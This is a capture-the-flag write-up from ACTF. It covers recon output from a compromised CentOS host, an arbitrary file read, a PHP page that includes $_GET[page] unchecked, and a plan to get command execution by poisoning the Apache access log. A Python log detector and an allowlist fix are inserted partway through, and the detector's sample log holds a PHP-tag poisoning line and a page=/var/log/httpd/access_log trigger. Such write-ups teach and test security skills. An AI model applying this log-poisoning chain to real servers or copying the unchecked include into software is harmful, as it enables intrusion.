unix 2 [ ACC ] STREAM LISTENING 12622 - private/error 
unix 2 [ ACC ] STREAM LISTENING 12626 - private/retry 
unix 2 [ ACC ] STREAM LISTENING 12630 - private/discard 
unix 2 [ ACC ] STREAM LISTENING 12634 - private/local 
unix 2 [ ACC ] STREAM LISTENING 12638 - private/virtual 
unix 2 [ ACC ] STREAM LISTENING 12642 - private/lmtp 
unix 2 [ ACC ] STREAM LISTENING 12646 - private/anvil 
unix 2 [ ACC ] STREAM LISTENING 12650 - private/scache 
unix 2 [ ACC ] STREAM LISTENING 12346 - /var/lib/mysql/mysql.sock 
unix 2 [ ACC ] STREAM LISTENING 12725 - /var/run/abrt/abrt.socket 

root pts/2 zhutou-centos-1- Sun Apr 6 01:34 - 01:34 (00:00) 
root pts/1 222.205.110.239 Sat Apr 5 12:53 still logged in 
root pts/1 222.205.110.239 Sat Apr 5 12:12 - 12:13 (00:01) 
root pts/1 222.205.110.239 Sat Apr 5 12:09 - 12:11 (00:01) 
root pts/0 zhutou-centos-1- Sat Apr 5 12:07 - 17:16 (05:08) 
root pts/0 222.205.110.239 Sat Apr 5 10:07 - 10:08 (00:01) 
reboot system boot 2.6.32-431.el6.x Sat Apr 5 09:36 - 02:19 (16:42) 


ARP -e
Address HWtype HWaddress Flags Mask Iface 
zhutou-centos-1-gw ether 00:0c:29:03:c2:e2 C eth0 
zhutou-centos-2 ether 00:0c:29:b6:4e:b8 C eth0 
172.17.1.5 (incomplete) eth0 


Kernel IP routing table 
Destination Gateway Genmask Flags Metric Ref Use Iface 
172.17.1.0 * 255.255.255.248 U 0 0 0 eth0 
link-local * 255.255.0.0 U 1002 0 0 eth0 
default zhutou-centos-1 0.0.0.0 UG 0 0 0 eth0 

That basically confirms zhutou-centos-2 is the target; ping -c 4 zhutou-centos-2 gives the IP 172.17.1.3:

PING zhutou-centos-2 (172.17.1.3) 56(84) bytes of data. 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=1 ttl=64 time=0.153 ms 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=2 ttl=64 time=0.166 ms 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=3 ttl=64 time=0.192 ms 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=4 ttl=64 time=0.170 ms 

Using curl to reach the arbitrary file read on 172.17.1.3: that vulnerability is still there, but the command execution has been removed. I got to this challenge fairly late, and temp files redirected into /tmp kept being deleted by a script, which wasted some time.

Since the stack was switched to Apache, continue gathering information.

Look through the access.log history, pull out the request for fuckti0n.php, and read that file:

<?php
// the page parameter is included as-is: no allowlist, no path check
if ($_GET[page]) {
    include $_GET[page];
} else {
    include "home.php";
}
?>

An arbitrary file include. Check php.ini:

disable_functions = 
allow_url_fopen = On 
allow_url_include = Off 

So remote file inclusion is not possible. Looking at /etc/passwd, there is an extra line:

boss:x:500:500::/var/www/boss:/bin/bash 

One can guess the flag is under the boss's home directory, but listing it needs command execution. The only files we can influence at this point are the logs, so plant the command execution in the log and have fuckti0n.php include it.
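Both halves of that chain leave traces in the web server's own access log: the poisoning request carries PHP code in a logged field, and the trigger request asks the include parameter for a log path. As an added example (my code, not the challenge's), here is a small detector that parses Apache combined-format lines and flags those two indicators, together with the allowlist lookup that should have replaced `include $_GET[page]`. The log lines, log path and page table are constructed for the demo.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# values that should never appear in a page/template parameter
SENSITIVE = ("/var/log/", "access_log", "access.log", "error_log", "/etc/passwd",
             "/proc/self/", "php://", "data:")

# Constructed sample log: a normal hit, a poisoning attempt (PHP tag in the
# User-Agent, which Apache writes verbatim into the log), and the trigger that
# makes the vulnerable include read the log back.
SAMPLE_LOG = [
    '172.17.1.2 - - [06/Apr/2014:01:40:12 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.17.1.2 - - [06/Apr/2014:01:41:03 +0800] "GET /fuckti0n.php HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '172.17.1.2 - - [06/Apr/2014:01:41:30 +0800] "GET /fuckti0n.php?page=/var/log/httpd/access_log HTTP/1.1" 200 9001 "-" "curl/7.19.7"',
]


def find_indicators(line: str):
    """Labels for everything suspicious in one log line (empty list if clean)."""
    m = LOG_LINE.match(line)
    if not m:
        return ["unparsed-line"]
    f = m.groupdict()
    hits = []
    for field in ("target", "referer", "ua"):
        if PHP_TAG.search(unquote(f[field])):
            hits.append(f"php-tag-in-{field}")
    query = parse_qs(urlparse(unquote(f["target"])).query, keep_blank_values=True)
    for param, values in query.items():
        for v in values:
            if v.startswith("/") or ".." in v or any(s in v for s in SENSITIVE):
                hits.append(f"file-include-in-{param}")
    return hits


def scan(lines):
    """Map line index -> indicator labels for the lines that have any."""
    report = {}
    for i, line in enumerate(lines):
        hits = find_indicators(line)
        if hits:
            report[i] = hits
    return report


PAGES = {"home": "home.php", "about": "about.php"}   # constructed allowlist


def resolve_page(name):
    """Hardened replacement for `include $_GET[page]`: a short name is looked up
    in a fixed table; anything else is refused (None -> respond 404)."""
    return PAGES.get(name or "home")


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(labels)}")
    print("resolve_page('/var/log/httpd/access_log') ->", resolve_page("/var/log/httpd/access_log"))
```

The same two rules can run as a SIEM query over the web server logs; a PHP open tag in a request field is never legitimate traffic, and an include parameter that names a log file is the trigger half of this technique.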

After listing the directory, read the file contents.

Who on earth is this goddess CX? fxxk

The remaining challenges went unsolved; waiting for WannaBe.

{ACTF WriteUp By L. @XDSEC.ORG}
